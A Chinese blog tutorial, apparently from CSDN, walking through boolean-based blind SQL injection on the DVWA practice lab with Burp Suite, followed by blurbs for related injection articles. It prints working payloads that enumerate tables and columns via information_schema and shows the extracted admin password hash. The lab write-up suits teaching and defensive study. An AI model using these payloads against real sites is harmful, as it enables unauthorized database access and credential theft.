SQL注入的原理与攻防实战4

最新推荐文章于 2025-04-13 11:41:57 发布
最新推荐文章于 2025-04-13 11:41:57 发布
阅读量78 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jdk12123/article/details/132020288
本文介绍了在dvwa靶场中使用burpsuite进行SQL盲注入的实践,通过布尔型盲注获取数据库名称后,进一步获取了表名guestbookusers,并展示了如何利用工具抓包来判断字段名,最终揭示了账号密码信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上期回顾

上期我们简单介绍了SQL盲注入的相关知识,以及盲注入之一的基于布尔型的盲注入,并且根据burp suite进行了数据库名称的获取,本章我们将利用burp suite进行其他信息的获取。

1:实验环境:

dvwa靶场(low),burp suite,火狐浏览器

2:抓包测试:

打开火狐浏览器:

1'and if(substring((select TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA=database() limit 1),1,1)='g',1,0)--+
利用上述代码去抓包

然后按下图所示设置好变量:

在这里插入图片描述
设置好payload之后提交攻击,筛选200得到下图:

在这里插入图片描述
获取表名 guestbook users

目前已知:dvwa库下有两个表:guestbook users
接下来我们尝试获取字段名:
1’and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=database() limit 0,1),1,1)=‘i’,1,0)–+

当前库的表的第一个列字符是否等于 i ,如果等于 i ,返回正则页面,否则返回错误页面。

然后利用burp suite进行抓包:

在这里插入图片描述

得到user_id:
修改200,201,即可获取其他字段(这里只演示如何获取第一个字段)

根据字段的获取:我们可以知道里面存放了密码:接下来我们进行账号密码的获取:

最后整理结果得出 admin:5f4dcc3b5aa765d61d8327deb882cf99

一篇文章教你玩转,入门级 SQL 注入实战
朱雀随云记的博客
04-11 1038
uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 2053
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
火狐浏览器渗透专版
02-13
火狐浏览器渗透专版,集成了火狐社区内最新的主流渗透插件,支持sql漏洞检测,sql注入,cookies欺骗,以及提权等插件技术,欢迎交流,下载,使用
【2025版】最新SQL注入看这一篇就可以了,从零基础到精通,收藏这篇就够了!
leah126的博客
02-18 1132
SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
利用SQLmap实现 SQL 注入
LAL07019的博客
06-28 2118
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。
Web安全攻防关键技术详解 - SQL注入XSS攻击实战指南
11-07
内容概要:本文详细介绍了Web安全攻防的关键技术,主要包括SQL注入、XSS攻击和CSR攻击的原理、绕过手段及防范措施。首先,讲解了SQL注入的基本原理、分类及常见的注入手法,接着介绍了如何使用SQLMap工具进行自动化...
CTF Web 安全攻防实战:基于 Python 的 SQL 注入 / XSS / 文件
最新发布
05-15
信息安全攻防实战:Web漏洞挖掘修复从0到1全解析 解析: 1. 知识领域:信息安全攻防(明确所属领域) 2. 技术关键词:Web漏洞挖掘修复(涵盖SQL注入、XSS、文件上传等核心技术) 3. 内容关键词:从0到1全解析...
Web安全攻防:从SQL注入到XSS跨站脚本实战
shejizuopin的博客
04-13 668
SQL注入和XSS跨站脚本攻击是Web应用中最常见的两种安全漏洞。为了有效防范这些攻击,开发者需要深入了解其原理和危害,并采取多种防御策略进行综合防护。在实际项目中,建议结合具体业务需求和环境配置,选择最适合的防御方案,并持续监控和更新系统以应对新型攻击手法。通过本文的实战分析,希望开发者能够更全面地了解SQL注入和XSS攻击,并掌握有效的防御技巧,为Web应用的安全保驾护航。
SQL注入绕过实战案例
08-31
我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入SQL Injection)是攻击者在Web应用的输入参数中插入恶意SQL代码,从而控制或操纵后台数据库服务器的一种技术。这种...
WEB攻防-通用漏洞-SQL注入-ACCESS一般注入偏移注入
weixin_45534587的博客
07-11 1146
同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的表必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin表的列数必须比当前查询的22列的列数少,因为要把查询到表塞进当前查询到列中,不理解往下看例子。union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin --回显错误。在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显。
SQL注入漏洞攻防
weixin_59616219的博客
12-20 1365
SQL注入漏洞攻防
漏洞学习--SQL注入
qq_45675619的博客
02-19 5677
漏洞学习--SQL注入
18个扩展让你的Firefox成为渗透测试工具
JX
12-13 1752
Firefox是一个出自Mozilla组织的流行的web浏览器。Firefox的流行并不仅仅是因为它是一个好的浏览器,而是因为它能够支持插件进而加强它自身的功能。Mozilla有一个插件站点,在那里面有成千上万的,非常有用的,不同种类的插件。一些插件对于渗透测试人员和安全分析人员来说是相当有用的。这些渗透测试插件帮助我们执行不同类型的攻击,并能直接从浏览器中更改请求头部。对于渗透测试中涉及到的相关
利用hackbar进行sql注入简单实例
Ro_kin的博客
07-16 1万+
这个简单的实例是对一个网址进行sql注入,获得管理员的账号和密码目标网址:http://www.xxx/news_detail.php?id=186步骤如下: (1)先猜解当前网页的字段数 在hackbar的输入框中输入: http://www.xxx/news_detail.php?id=186 order by 7 页面显示正常,输入 http://www.xxx/news_deta
SQL手工注入探索旅程(一)
Louisnie
09-30 9402
SQL注入漏洞原理 由于程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始的SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句 实验环境: kali:192.168.128.128/24 metasploit:192.168.128.129/24 我们首先看一段很简单的PHP代码查询数据...
Sql注入实战
永不垂头的博客
07-27 1408
学习笔记—Sql注入实战篇 一、编写注入的网页,用于实战。 index.php link.php 在老板火狐中开启hackbar, 进行sql注入。 Google中hackbar破解方法: https://www.fujieace.com/hacker/tools/hackbar.html 二、Sql注入基本流程(实战篇): 输入单引号报如下错误 1=11=2的区别:(参考链接: https://www.cnblogs.com/xyz315/p/13043950.html)第一步,判断是否
Web安全基础之Mozilla Firefox常用插件
热门推荐
高飞的博客
03-03 31万+
Mozilla Firefox,中文俗称“火狐”(正式缩写为Fx或fx),是一个由Mozilla开发的自由及开放源代码的网页浏览器。其使用Gecko排版引擎,支持多种操作系统,如Windows、macOS及GNU/Linux等。Firefox有两个升级渠道:快速发布版和延长支持版(ESR)。快速发布版每四周发布一个主要版本,此四周期间会有修复崩溃和安全隐患的小版本。延长支持版每42周发布一个主要版本,期间至少每四周才有修复崩溃、安全隐患和政策更新相关的小版本。由于该浏览器开放了源代码,因此还有一些第...
菜鸟日记之SQL注入原理&万能密码注入
Blazar_star的博客
11-07 2万+
十一月二号,阴天,想听陈奕迅。 今天看到的这个还挺有意思的,SQL注入原理和万能密码。 数据库老师只是随口带过的一句话没想到竟然是SQL注入的关键.....果然...有自己独立的思考才是最重要的。 --------------------------------------------------------------------------------------------------...
sql注入——HTTP头部注入
weixin_43102772的博客
02-22 987
HTTP请求头内容 POST(请求方式) /sqli-labs/Less-18/(请求目标资源) HTTP/1.1 (协议版本) Host: 192.168.0.63(目标主机) User-Agent: Mozilla/5.0 (X11; Linux x86_ 64; rv: 73.0) Gecko/20100101 Firefox/73.0 (客户端浏览器版本) Accept: text/ht...
SQL注入攻防:MySQL技巧实战示例
"这篇内容主要介绍了SQL注入技术,这是一种网络安全问题,黑客利用它来攻击数据库系统。通过SQL注入,攻击者可以操纵数据库查询,获取敏感信息,甚至控制整个数据库服务器。学习这个技术对于理解网络安全防御至关...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值